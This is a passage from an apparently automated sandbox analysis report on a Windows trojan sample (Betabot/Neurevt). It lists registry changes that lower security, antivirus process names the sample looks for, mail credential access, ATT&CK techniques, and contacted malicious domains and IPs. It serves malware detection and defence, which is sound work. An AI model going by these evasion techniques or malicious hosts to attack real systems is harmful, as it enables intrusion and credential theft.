                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_004295F5 GetSystemTimeAsFileTime,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_0042997E GetTimeZoneInformation,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_0044E930 GetVersionExA,_fast_error_exit,_fast_error_exit,GetStartupInfoW,GetModuleHandleA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Modifies Internet Explorer zone settings
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 2500Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 2500Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 2500Jump to behavior
                      Source: Documento--SII--33875.exeBinary or memory string: Firewall\GDFwSvc.exe
                      Source: Documento--SII--33875.exeBinary or memory string: Windows Defender\MSASCui.exe
                      Source: Documento--SII--33875.exeBinary or memory string: mcagent.exe
                      Source: Documento--SII--33875.exeBinary or memory string: AVKTray\AVKTray.exe
                      Source: Documento--SII--33875.exeBinary or memory string: avcenter.exe
                      Source: Documento--SII--33875.exeBinary or memory string: cfp.exe
                      Source: Documento--SII--33875.exeBinary or memory string: SBAMTray.exe
                      Source: Documento--SII--33875.exeBinary or memory string: sched.exe
                      Source: Documento--SII--33875.exeBinary or memory string: mcshield.exe
                      Source: Documento--SII--33875.exeBinary or memory string: AVK\AVKService.exe
                      Source: Documento--SII--33875.exeBinary or memory string: Firewall\GDFirewallTray.exe
                      Source: Documento--SII--33875.exeBinary or memory string: avgui.exe
                      Source: Documento--SII--33875.exeBinary or memory string: avgwdsvc.exe
                      Source: Documento--SII--33875.exeBinary or memory string: pctsSvc.exe
                      Source: Documento--SII--33875.exeBinary or memory string: avgupd.exe
                      Source: Documento--SII--33875.exeBinary or memory string: MsMpEng.exe
                      Source: Documento--SII--33875.exeBinary or memory string: mcupdate.exe
                      Source: Documento--SII--33875.exeBinary or memory string: a2service.exe
                      Source: Documento--SII--33875.exeBinary or memory string: pctsAuxs.exe
                      Source: Documento--SII--33875.exeBinary or memory string: MSASCui.exe
                      Source: Documento--SII--33875.exeBinary or memory string: avguard.exe
                      Source: Documento--SII--33875.exeBinary or memory string: BullGuard.exe
                      Source: Documento--SII--33875.exeBinary or memory string: avp.exe
                      Source: Documento--SII--33875.exeBinary or memory string: pctsGui.exe
                      Source: Documento--SII--33875.exeBinary or memory string: AVENGINE.exe
                      Source: Documento--SII--33875.exeBinary or memory string: a2start.exe
                      Source: Documento--SII--33875.exeBinary or memory string: avgnt.exe
                      Source: Documento--SII--33875.exeBinary or memory string: FPWin.exe
                      Source: Documento--SII--33875.exeBinary or memory string: procexp.exe
                      Source: Documento--SII--33875.exeBinary or memory string: a2guard.exe
                      Source: Documento--SII--33875.exeBinary or memory string: mbam.exe
                      Source: Documento--SII--33875.exeBinary or memory string: RavMonD.exe
                      Source: Documento--SII--33875.exeBinary or memory string: sbamui.exe
                      Source: Documento--SII--33875.exeBinary or memory string: op_mon.exe
                      Source: Documento--SII--33875.exeBinary or memory string: FProtTray.exe
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidationJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Betabot
                      Source: Yara matchFile source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3696, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documento--SII--33875.exe PID: 4948, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9sek3aw7533q9.exe PID: 6616, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 3332, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 2188, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 2036, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 3060, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 4612, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9sek3aw7533q9.exe PID: 5704, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 2248, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9sek3aw7533q9.exe PID: 6208, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 4668, type: MEMORY
                      Source: Yara matchFile source: 5.2.CpSHySoEfzH.exe.4650000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.9sek3aw7533q9.exe.2160000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.explorer.exe.2a00000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.9sek3aw7533q9.exe.960000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.CpSHySoEfzH.exe.4060000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.CpSHySoEfzH.exe.4470000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.CpSHySoEfzH.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.CpSHySoEfzH.exe.3ed0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CpSHySoEfzH.exe.3b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.CpSHySoEfzH.exe.41d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Documento--SII--33875.exe.22a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.CpSHySoEfzH.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.CpSHySoEfzH.exe.4000000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.CpSHySoEfzH.exe.3dd0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CpSHySoEfzH.exe.3ad0000.1.raw.unpack, type: UNPACKEDPE
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Users\user\AppData\Roaming\.minecraft
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Program Files (x86)\League of Legends

                      Remote Access Functionality:

                      barindex
                      Yara detected Betabot
                      Source: Yara matchFile source: 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3696, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Documento--SII--33875.exe PID: 4948, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9sek3aw7533q9.exe PID: 6616, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 3332, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 2188, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 2036, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 3060, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 4612, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9sek3aw7533q9.exe PID: 5704, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 2248, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9sek3aw7533q9.exe PID: 6208, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CpSHySoEfzH.exe PID: 4668, type: MEMORY
                      Source: Yara matchFile source: 5.2.CpSHySoEfzH.exe.4650000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.CpSHySoEfzH.exe.3bd0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.9sek3aw7533q9.exe.2160000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.9sek3aw7533q9.exe.8c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.explorer.exe.2a00000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.9sek3aw7533q9.exe.960000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.CpSHySoEfzH.exe.4060000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.CpSHySoEfzH.exe.4470000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.CpSHySoEfzH.exe.3b10000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.CpSHySoEfzH.exe.3ed0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.CpSHySoEfzH.exe.3b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.CpSHySoEfzH.exe.41d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.Documento--SII--33875.exe.22a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.CpSHySoEfzH.exe.3740000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.CpSHySoEfzH.exe.4000000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.CpSHySoEfzH.exe.3dd0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CpSHySoEfzH.exe.3ad0000.1.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1LSASS Driver1LSASS Driver1Disable or Modify Tools21OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Image File Execution Options Injection1Image File Execution Options Injection1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsShared Modules1Registry Run Keys / Startup Folder11Process Injection612Obfuscated Files or Information2Security Account ManagerSystem Information Discovery45SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder11Software Packing21NTDSSecurity Software Discovery441Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol24SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion24SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion24Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection612DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)NTFS File Attributes1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 366082 Sample: Documento--SII--33875.bin Startdate: 10/03/2021 Architecture: WINDOWS Score: 100 74 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->74 76 Antivirus detection for URL or domain 2->76 78 Multi AV Scanner detection for dropped file 2->78 80 11 other signatures 2->80 9 Documento--SII--33875.exe 2->9         started        12 9sek3aw7533q9.exe 2->12         started        14 9sek3aw7533q9.exe 2->14         started        16 2 other processes 2->16 process3 signatures4 92 Detected unpacking (changes PE section rights) 9->92 94 Detected unpacking (overwrites its own PE header) 9->94 96 Injects a PE file into a foreign processes 9->96 18 Documento--SII--33875.exe 12 25 9->18         started        21 9sek3aw7533q9.exe 23 12->21         started        23 9sek3aw7533q9.exe 14->23         started        25 9sek3aw7533q9.exe 16->25         started        process5 signatures6 82 Creates an undocumented autostart registry key 18->82 84 Maps a DLL or memory area into another process 18->84 86 Sample uses process hollowing technique 18->86 88 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->88 27 explorer.exe 16 55 18->27         started        90 Hides threads from debuggers 21->90 process7 dnsIp8 54 rusianlover.icu 212.114.52.43, 49715, 49718, 49720 COMBAHTONcombahtonGmbHDE Germany 27->54 56 estrelladamm.icu 8.210.47.214, 49719, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 27->56 58 zakriasons.co 104.21.55.228, 443, 49716, 49717 CLOUDFLARENETUS United States 27->58 46 C:\Users\user\AppData\Local\...\iom7q73oi.exe, PE32 27->46 dropped 48 C:\Users\user\AppData\...\agq5ooig7au.exe, PE32 27->48 dropped 50 C:\Users\user\AppData\...\9sek3aw7533q9_1.exe, PE32 27->50 dropped 98 System process connects to network (likely due to code injection or exploit) 27->98 100 Creates files in alternative data streams (ADS) 27->100 102 Overwrites Windows DLL code with PUSH RET codes 27->102 104 5 other signatures 27->104 32 iom7q73oi.exe 27->32         started        36 CpSHySoEfzH.exe 2 23 27->36 injected 38 9sek3aw7533q9_1.exe 27->38         started        40 11 other processes 27->40 file9 signatures10 process11 dnsIp12 52 192.168.2.1 unknown unknown 32->52 60 Antivirus detection for dropped file 32->60 62 Multi AV Scanner detection for dropped file 32->62 64 Tries to steal Mail credentials (via file access) 32->64 66 Adds a directory exclusion to Windows Defender 32->66 42 powershell.exe 32->42         started        44 powershell.exe 32->44         started        68 Hides threads from debuggers 36->68 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 36->70 72 Machine Learning detection for dropped file 38->72 signatures13 process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Documento--SII--33875.exe49%VirustotalBrowse
                      Documento--SII--33875.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\iom7q73oi.exe100%AviraTR/Spy.Gen
                      C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe40%ReversingLabsWin32.Trojan.Neurevt
                      C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe47%ReversingLabsByteCode-MSIL.Trojan.Wacatac
                      C:\Users\user\AppData\Local\Temp\iom7q73oi.exe21%ReversingLabsWin32.Trojan.Wacatac

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      14.1.9sek3aw7533q9.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      3.2.explorer.exe.e0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.1.Documento--SII--33875.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      3.2.explorer.exe.6870000.6.unpack100%AviraTR/Dropper.GenDownload File
                      33.2.9sek3aw7533q9_1.exe.11d0000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      2.2.Documento--SII--33875.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      31.2.9sek3aw7533q9.exe.1180000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      1.2.Documento--SII--33875.exe.11c0000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      14.2.9sek3aw7533q9.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      34.2.iom7q73oi.exe.400000.0.unpack100%AviraTR/Spy.GenDownload File
                      32.2.9sek3aw7533q9.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      32.1.9sek3aw7533q9.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      19.2.9sek3aw7533q9.exe.11e0000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      21.1.9sek3aw7533q9.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      21.2.9sek3aw7533q9.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      34.0.iom7q73oi.exe.400000.0.unpack100%AviraTR/Spy.GenDownload File
                      11.2.9sek3aw7533q9.exe.12e0000.1.unpack100%AviraTR/Patched.Ren.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      zakriasons.co4%VirustotalBrowse
                      estrelladamm.icu2%VirustotalBrowse
                      rusianlover.icu1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
